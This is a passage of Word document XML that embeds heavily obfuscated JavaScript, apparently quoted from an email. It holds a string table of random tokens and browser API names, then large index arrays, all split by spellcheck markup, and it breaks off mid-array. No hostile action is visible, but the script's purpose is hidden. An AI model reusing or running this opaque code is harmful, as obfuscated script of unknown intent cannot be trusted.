        <w:t>", "fYg5sH0", "description", "r8dU5CGmjg", "szHoa9cLF44QbNvf13kvig", "Jcpx-yD9jEq1", "d9w", "c5l66wm14Q2t", "aC-XFdxdYp8", "zyLEJ6wwIrMvJP_RikUZj8VtGAsutSzpBpn3ymg", "AhWuE511EK4HebbU8zB8kocLSA", "VIYx9k-EjQaa41g", "oHneEeAkDrlQeLzb9nNc5ecwMRUlhzL-YN3g9X9Erl4", "L0-1IsZ2Pr9gG5mZoypo-aUQKC5j4ULUc5S08G13zwM", "OYgF91bz2iSl9CQB", "done", "3zD2NIA1Ug", "qYMh03jhySI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initCustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Uint8Array", "create", "Intl", "(?:)", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "di-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TXupMZZA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EX7iAQ", "mark", "gnvzO9c", "p4EC7nb-", "rY9n7AE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjTceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zNMWnX_KkDLh5g", "\uD83D\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDCCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jYxHyAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zkbjQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mYMHkVHZ42SNsjEB", "1tVSthGkjw", "log", "head", "push", "constructor", "sin", "fs4knQ_B-Abh4X89P92qSWb5_a6TDQ", "uEHlbIswK7F8V9vL4ldnhYg", "2bMV0GXJ3yKTojdKC6SReCSv4_GnX_9uugA2bpvnMJFNGPzfj_-akEGeKJJqdQJ3gMQjxo9-2A", "6pdJn0yI6CuwungsHpKdfzk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AvNA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "3M4V932vszHn9xg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x", "Rw6bN4JAaaMvC9uNpQE61w", "FO1mhwDM4iCDwHEeEpHyXw", "lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt", "0FnNSoYwP5RHffvo2m4", "3i_Ra7cqIe8mMLek", "LCM", "arguments", "JMAz0w-3tiLE-g", "4H7HD7sdOfFobaDZzl8WuuZqV0c2hjLuZZbk8AJH0Dg", "aGHrCYwnPuREBMLx6z5j5Q","Mr50iiaM-A", "writable", "MwK0OA", "kPZNqg-YilOM7g", "sV_wKIIGO8ttUc2l", "FHjmOIovJolgTdit-1h88g", "n91ZuCCxjlTlv2YvQu2cLEujh-6SOO0p", "JRGHVPRdL5Q", "cUTaIaAyDqJ0", "kQqmeMJ2b8kA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "UttJkXS5jibD5C1MS-Pdcme0ppU", "event", "MkHzApF3dMJJE4M", "8MY", "PS7AXZl1AO8", "BhqpMvYVILw8PbDVyT0tva1TXQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qrAK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PO1NmT-XuVGZ9z4", "TdIJj2i9zzKSxQ", "OkfGaeg0aORgKQ", "F5gnqATx0hCe6j9c", "t13MY_IGdcxAAcajw3k", "LwbtZM8rf9EPBY22", "onload", "HIVFgTT_30qQ", "viTBCaoOOfUPfLjS1kJEqOZvR0Ip3BbkZdeJp3YIvBA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VdQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1ErdX7NL", "7F3oaIg5RPdHC6WO6Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zeIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "5WCVR7dyRNsye-2umX5jlw", "filter", "0", "JECHA-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tTBKNlc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qigw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UegWyHbYqSE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "cFLpP9U_Zr8EJbiFrA", "i2-CIa9uGbQQFKc", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"Y493pQSpyUbohUkTLOfnGiDfnPeJO5Y", "-_Y_5FPwjRjDz0R-fZugSB4", "u7pRx1CLnVqqvQ", "_55JmD-G_xQ", "\u202EYuuMIdcQn\u202D", "0oEvzW_G5RKN6w", "o9pJ9ynH0mT9oTM", "2LdO3CU", "ylamdcpDB7Zpcw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OWOqRuZFZqhK</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pBaKFMtA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "VR2GDMt6aPkQPbiKmj8FzPw_cUZ9gQ", "AoI5kgWF8yLXrwUy", "Infinity", "BNl-4kg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nftEuAGgnQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DuZAhTCc-HL2t3UXQ96cMWv3hIu5Hr8xpUw4WNyYe_RYWqGX9fLTyxP4P-VJJ0Qv-ZZ4ks0Hzhg_rhRP", "AOAc13LA6S_SsQ", "Ccs3jEbbwR_G0FxkZJb7Sg", "RKlNq27j-BmOyEgzDujP", "3MIm-V7Tw2PK5xwk", "QRGDb81vEfEQd7jH", "V7835Fbw7Fi4kB13KZmkAQWY1fTRb8ARxiYVQ52gXw", "MW3iec5nEfBUDA", "m33DSLwAeuRdL6Wh00ML", "cCvROI9ZXg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RqhuyQKxjFiLhgUA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "navigator", "l8QoxGzUyQ", "j3TiOI4iMIkpGJ_FvQxpw4sSGSBo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enctype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "click", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nEyGDcBFTpxUQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CJMD3iLukCi03n1zVQ", "znTKVaITZ6M", "xCveVasIBOg-ZKb1iQVL7rZ1HFAfgS32YN3l1RQPsSeUiTRnKz5QaMw75iHFx4A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WFqPDw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xh7RGboeW-AxIO673wBd8LAxBw1t3Tr0Mse21WVF", "6BGPZ_5dfb0vcbyS", "Rf8bkQ", "lGv6MdsAZdVEK5KKu3o", "dASTXPRPTvwdOrrvizUBq6Ig", "70", "Vo1dph-spWKzpiw", "qpoZhyWL8w8", "FL9QrTecimer6DA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zALXOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "all", "biXPVr4v", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "eCjmXp8XQsUeDA", "VEO4YNR8HZRoQoT8pD830IIUbXFatX_AWvM", "pNZ16QfzqlKalwlVe7P6TE7T_7uqK4kWiTYfMw", "cE-9Xd99", "y0qVAtRrOIhCfA", "-vNK1zS6nw", "9YNAwDa8sku9gW4O", "SXmDSMReS5dxAPw", "CZ9srEqN3U2vn1kKSpC6VhiJ1_vNOMAO0m4HD_XqVKsvPpqy9vTjvy6uWZ0wWmxG4q8ck7ki9RQL0hc2o3Deg1aKpd4IW0TfbCFlYqwMF9Wm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nRfGSA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GGXfVswXKdQU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PAHkLJQ5INQFENebtXAgydlafzsG-zq-Z_j1", "RtcvnjvNm2iR3m0CC-TdYmXIhZ2iM5xyvEJaDInSfsZYDv_prKv6xg2QXb0eEXcgiOw", "jWCiI8h-apR_", "muFugBuEslvNg0RlKKv_Sjms--XzUIVB8G87dqmkWbgtJ6mt9q_4", "OIp6_iCJjmu5", "Q55p0AGQ_g", "submit", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DOMContentLoaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Float32Array", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NIkcymjQzDKF-mUFR_HLMg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "location", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[\x00\x00\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x00\x00]\x00", "1tYQjGDUyg", "JTG3IQ", "height", "\u3297\uFE0F", "lTWLbJxpcoI1Xg", "pHelP7V8bPVbI4s", "gLMjwFzCsUmFzwljb-q4Hnne7brwHYQHtSVectjiWZBvVOs", "1k7YRq0aO_pnGKG_1A8L", "3WuPEe5XHLRtfeTIzGhfsuYwO0lb0GTpKA", "46Q5lxz5gSKN8jJdNpTrFgCHzpDyWIIR4gsRRsPgDg", "3sNy_ACl8l_Y", "S9tC5Dzijg", "rLVK8TeR5nbH2k90", "IFKDFvlDWOB3", "CY1WtzunmSC85TpiV5GXdh_fkYOJb7s9zjsDBJazOqcEEQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>L_FNxQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uBGnU4k2Uak4P-Pzow", "6HKeLeoRS4QdHJuy", "cmW0RZElYeoBTQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyDescriptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JjWxEI9rcA", "k5gU", "avZD93Ha1Qg", "q4UCvAWn_3Xz", "k9Bixge5vUXO2nVsZoG3UjiH5KT3Vc1WgyhNdIvw", "jtFV0G_SrFI", "n0vdH-8lGNBGWo7vyw", "kNsen1TnyiQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>firstChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "xQ3XJrxwV98UFdKGsQIBquZ3XWl2xDj0Lvy8h34U3A", "SgyHTaRpV5MfMY_O_GJNrt09N1U", "eJh5x3OMlQ", "CNF_8RGg3w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ElKAHeRGZvZ_ILM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XQatErQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MleUPd9lbg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QbcGyz_R</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x_peig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "JzznK4YhVNsSDIDH_hIl", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"gyzEZLIgeOB8H8U", "MIAZ1iHGzSWO8nQVSvrB", "KuFms0eYtFv69SFDcOPPNw_gqIaqU7tHsQJ5MejeMskASrg", "status", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KXaxFto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "TMxUiS6Q433krQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EmPhRpcIJA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "charset", "f5M2ijeC707Q", "prototype", "dgitc7VddtsjFt6MlBE4mpNTU2ZA", "07pKxTeIg2mtqDNDXLuAZjPj-MTJDaRqugZ7BOOhJw", "XxHiUvIMe6FRFq3J2gIXsq4Z", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HIZzoSOxjUs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "GfU-jU3ygAg", "capture", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "9", "WyGhP9Q3M5IJTYiH-CJHyNxKYSB-8EvVUJ2Z6W4vyEv_", "9RGrE5sRYfhSN56g2Cheu79UFH9V", "uLBI4SfJ9Q", "zjqAOKcqUMJBD6CW-xpmgLN0BUl3mhQ", "jfIagXXNlzuPtT0", "tibcGbsVYuwLPPeGwVlUufFoDhQ83gGjP5fP4zJNjUaTh1VqHHkJDd8S-H-Ewg", "t_scsXj0pzDL8CxyWbTd", "open", "YE27A9ZINYU4EZy3wWka44N4Om1fqHKvWg", "-E_wRJwGKN9de-Lr6w", "Xr8O70mo", "\uD83C\uDF7C", "_VesN9lqI4dIAMeesUI9nsFZRDQ3uw-QWLCa4wZDz1Hotkts", "WMA8hzncwkrBx2I", "LiDQf-h1Kw", "wQKNVblWUL0MZvc", "dmzENKdrRr0NUueFlThxwclxMQ", "vCWDUL1q", "lvYs133FjA", "Array", "YhOoZ5JVNpR9CtG3mwJwnYBAXHlG8FeUFvGBmBA","p1_hJ5I9", "oY0j6Ef2kgaf1SFRM5o", "XxTdHrwFRfw6OejEyBpb_aExMj9U1Dn4fA", "bQnUXe8EE586feLo4EEWs-c", "zX-XKo8", "LN4y8Q", "", "7J0cqEfAxCemtHo-cP-QKA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SOlqyQI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HZ1Puw-6unCiuTovXtjNd1ixyZ6Rfep4w012WoCSP_IYVNzYn9Lfym_SDt9RIkw", "7CurUPh0c50fAA", "g0ezaMlqdrdHLNXZ7Dw", "n4F13An20A", "ibs0gRjv6x8", "NaMfyTPmul62-G5OZQ", "UadCgjmRyHiwwSVdU8_fKnGjj5zBH-p0tggHFP7BQ_5HQOI", "OcJSkDyWj0zW4j8", "uWHbOqFkf4w3XtmgrDVQ_PJoBytT8WG0f_XQpyFS2gijwjpTCUkTbLwQhC6L4q_tYA", "Wbd_sgC5qk7aqAU", "3Y4-zHvg", "h7J5uCQ", "Twi9Mdk9NMccS52a93F92cBXdg", "SjLYTNADCNE4KZU", "lc02yWXA70HfgWpUPLniSg", "zNNz0Aumrn7C3Ghn", "0XPaYOBaUcFmFL2Tvn0Tmw", "x4hY7DGP0mrAwVVk", "F5lIuzzu", "OEzqU_VfJ4Ed", "vulAtg6pkFbjsEppXbs", "Ci2SZddRVKoOWZWurVgeg813", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nzGxOaQZFpM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rE6YRfkbLPsXMa_1jC8P7Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "NLpxgj_Z9FiE", "every", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WOZipCg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tt8mq178rTeCiQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DSGEb6NITc85efDZtg", "Ieturl-a2U3ZmhRTEOa_HUfXlbSJZoNHmTBESrGzIq5zJey3rL-65nPrAdN2FTUfl-RDzfttsUpIm1xo4DWa2lWJ", "BXGWOK8pdpt3VNI", "q7QNkGjErg", "slice", "ausA8ySD7Cv5i1FsIP6oYCi7up20W_Ra-XQvcNCqYQ", "EBvPXrULS6oIYqT8", "P3b1fpc2KcFdEMTw-jdy06gDfDBg40ORDZ77_AxWw0Lw_kFcF3ttOaBAh0uv8KzdPD-EKz_4a7rIHrS8EugRH5AoTwbHmpsT8In__wKiplFk_Wtc4EMY1EAMqrdHMzc_2SV13TkxTi_0u6Ukc826Klbbx6nrmIGn0GYoYGYmOWWamJVSWFqc5GGCsn4wHarWIHn6c20vJCOm4VtLEn-Kmor915KdQ-IDHbI62ZSbVlDdxc3dXG5L3WymJvnrSpEkQhhqUvDHzaUPshdR_A3OjYYWuAKt4vulzQ", "TZx2", "aCD6cfgnIqYG", "rz3HAqAOefcQIfmygXxVpvZlJ1Q4lyfjKYzl5RoNvwfFzx8AX1tMEcQJ8nnSr4qoRk2je0beX_7kD-DZSI8vD_kuCGCqseJ8nc2SxFS-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>r38M_xA5jwlu8zJMrcguV1tNrHky6QNGH06LoIBWNKXkaAvB-suj3fjWzTV7FBAAYwT16-BACVP-3Uyrkw", "M6B2iBrB_leciw", "JsgrnSLNk0yS3Wo","trhIsmDGvlurxAEpcqrhJXs", "TrYYy3HMwg", "ceZIrlP5uEfHyFg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "iterator", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TOc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836599D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     var d = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>RN(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1818B44E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [[[9, 51], [8, 116], [6, 180], [6, 10], [3, 59], [9, 182], [2, 21], [7, 120], [5, 1], [8, 7], [3, 121], [3, 208], [0, 41], [0, 161], [6, 172], [4, 17], [1, 70], [0, 124], [3, 179], [5, 211], [9, 23], [6, 229], [7, 163], [7, 210], [1, 98], [0, 173], [8, 176], [5, 154], [9, 13],[4, 146], [8, 132], [1, 189], [7, 225], [2, 212], [0, 218], [8, 125], [9, 3], [5, 117], [0, 112], [5, 28], [2, 66], [7, 164], [1, 128], [3, 187], [3, 61], [8, 139], [4, 22], [0, 26], [1, 103], [7, 99], [5, 12], [0, 198], [4, 100], [1, 126], [5, 84], [1, 134], [1, 206], [8, 151], [1, 27], [9, 196], [8, 34], [0, 114], [6, 184], [0, 197], [0, 101], [4, 102], [1, 86], [0, 123], [8, 140], [2, 32], [9, 188], [7, 6], [3, 106], [9, 37], [8, 205], [9, 202], [9, 4], [9, 214], [3, 94], [4, 74], [7, 79], [5, 71], [1, 109], [1, 159], [0, 64], [1, 152], [5, 68], [1, 78], [3, 156], [8, 90], [4, 50], [8, 38], [9, 150], [3, 31], [9, 127], [4, 46], [5, 167], [6, 183], [0, 54], [5, 30], [7, 60], [8, 107], [7, 133], [5, 49], [8, 14], [6, 72], [3, 201], [1, 175], [8, 67], [4, 88], [2, 63], [5, 157], [3, 145], [7, 108], [8, 147], [7, 9], [9, 36], [3, 5], [9, 52], [3, 222], [4, 148], [7, 200], [1, 166], [7, 131], [8, 57], [8, 207], [2, 169], [2, 181], [4, 53], [3, 195], [5, 224], [1, 144], [1, 135], [5, 230], [6, 168], [6, 56], [9, 192], [4, 138], [4, 65], [5, 16], [5, 190], [6, 155], [0, 19], [6, 171], [1, 165], [9, 82], [5, 75], [2, 203], [4, 58], [2, 136], [8, 216], [6, 118], [1, 0], [8, 39], [4, 119], [0, 29], [5, 105], [5, 227], [3, 81], [6, 93], [7, 186], [5, 2], [3, 217], [2, 11], [5, 87], [7, 122], [5, 142], [8, 47], [6, 162], [1, 43], [8, 25], [0, 174], [0, 149], [8, 226], [3, 69], [8, 73], [3, 143], [5, 104], [7, 76], [9, 77], [4, 141], [9, 33], [1, 219], [2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C9C6C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve"> 130], [5, 35], [7, 83], [5, 160], [3, 223], [5, 178], [5, 80], [7, 89], [8, 113], [1, 170], [8, 110], [1, 209], [2, 215], [7, 153], [0, 24], [0, 42], [6, 220], [6, 191], [5, 115], [9, 48], [9, 18], [0, 111], [5, 96], [4, 44], [1, 91], [4, 92], [1, 228], [8, 194], [5, 158], [7, 221], [7, 15],[1, 95], [0, 129], [1, 55], [4, 204], [6, 97], [8, 8], [2, 20], [8, 45], [2, 185], [5, 213], [2, 199], [9, 40], [0, 62], [4, 193], [5, 137], [6, 177], [7, 85]], [[1, 176], [7, 74], [2, 72], [0, 188], [2, 133], [4, 199], [0, 47], [5, 49], [3, 210], [8, 227], [2, 203], [6, 17], [9, 112], [0, 45], [5, 194], [4, 73], [6, 69], [8, 27], [9, 163], [9, 222], [7, 14], [0, 51], [0, 106], [2, 109], [4, 122], [3, 148], [9, 228], [9, 1], [4, 206], [7, 114], [8, 229], [4, 103], [8, 157], [1, 31], [7, 30], [2, 219], [3, 29], [2, 81], [9, 186], [3, 189], [3, 2], [8, 79], [7, 141], [1, 214], [1, 35], [2, 185], [3, 107], [5, 197], [9, 204], [3, 75], [3, 145], [9, 100], [0, 140], [9, 22], [8, 7], [4, 187], [1, 83], [4, 151], [3, 165], [0, 40],[1, 66], [4, 11], [6, 213], [3, 131], [1, 162], [6, 178], [2, 123], [6, 43], [2, 150], [3, 223], [4, 95], [6, 99], [0, 196], [3, 18], [2, 65], [1,55], [0, 46], [1, 53], [0, 104], [1, 41], [4, 179], [7, 182], [1, 134], [5, 153], [7, 64], [4, 78], [0, 175], [0, 130], [1, 60], [1, 195], [4, 218], [3, 32], [6, 190], [9, 144], [1, 84], [3, 118], [3, 149], [8, 132], [3, 63], [4, 158], [2, 152], [0, 33], [9, 164], [6, 8], [1, 136], [4, 192], [9, 4], [6, 94], [1, 19], [8, 76], [0, 143], [4, 88], [4, 171], [6, 180], [3, 105], [6, 50], [6, 39], [2, 56], [2, 169], [4, 26], [1, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">28], [2, 142], [9, 156], [7, 119], [6, 12], [0, 48], [6, 21], [4, 44], [4, 108], [6, 127], [1, 208], [5, 34], [2, 92], [3, 215], [7, 37], [4, 198], [2, 211], [9, 230], [9, 70], [1, 191], [7, 173], [7, 116], [1, 67], [2, 0], [9, 77], [1, 120], [1, 129], [4, 80], [3, 220], [0, 135], [0, 3], [9, 93], [8, 205], [5, 170], [9, 216], [2, 38], [9, 124], [0, 168], [8, 62], [2, 167], [1, 172], [2, 68], [6, 201], [4, 113], [9, 15], [5, 161], [9, 54], [9, 147], [4, 117], [1, 212], [9, 159], [5, 128], [1, 71], [9, 160], [9, 221], [1, 125], [6, 101], [0, 166], [0, 85], [2, 138], [3, 224], [5, 200], [3, 91], [4, 6], [4, 86], [9, 59], [9, 155], [0, 217], [2, 139], [2, 9], [5, 225], [1, 193], [8, 20], [3, 137], [5, 183], [7, 102], [9, 13], [4, 226], [6, 52], [8, 115], [9, 184], [6, 5], [0, 23], [4, 177], [9, 36], [6, 42], [5, 24], [8, 25], [5, 87], [3, 174], [0, 82], [4, 146], [3, 89], [0, 96], [2, 10], [4, 110], [2, 111], [6, 181], [7, 121], [8, 16], [9, 154], [9, 90], [7, 97], [1, 98], [1, 209], [2, 207], [1, 61], [0, 58], [1, 126], [7, 202], [2, 57]], [[6, 157], [4, 118], [2, 20], [1, 130], [7, 43], [8, 125], [2, 79], [1, 187], [5, 109], [6, 25], [8, 135], [5, 140], [0, 65], [1, 122],[7, 12], [8, 172], [8, 15], [0, 144], [4, 156], [8, 5], [9, 7], [2, 16], [1, 27], [2, 145], [6, 28], [3, 0], [2, 201], [8, 91], [1, 17], [3, 68], [3, 134], [5, 149], [4, 63], [6, 192], [0, 94], [7, 146], [1, 212], [8, 198], [5, 47], [4, 99], [6, 86], [8, 139], [6, 66], [7, 57], [8, 162], [8, 110], [0, 120], [8, 215], [6, 216], [9, 168], [4, 200], [6, 158], [8, 190], [5, 64], [7, 119], [7, 186], [1, 183], [8, 88], [3, 24], [7, 228], [7, 165], [5, 26], [6, 116], [7, 222], [7, 95], [0, 181], [0, 189], [6, 71], [2, 55], [4, 203], [6, 147], 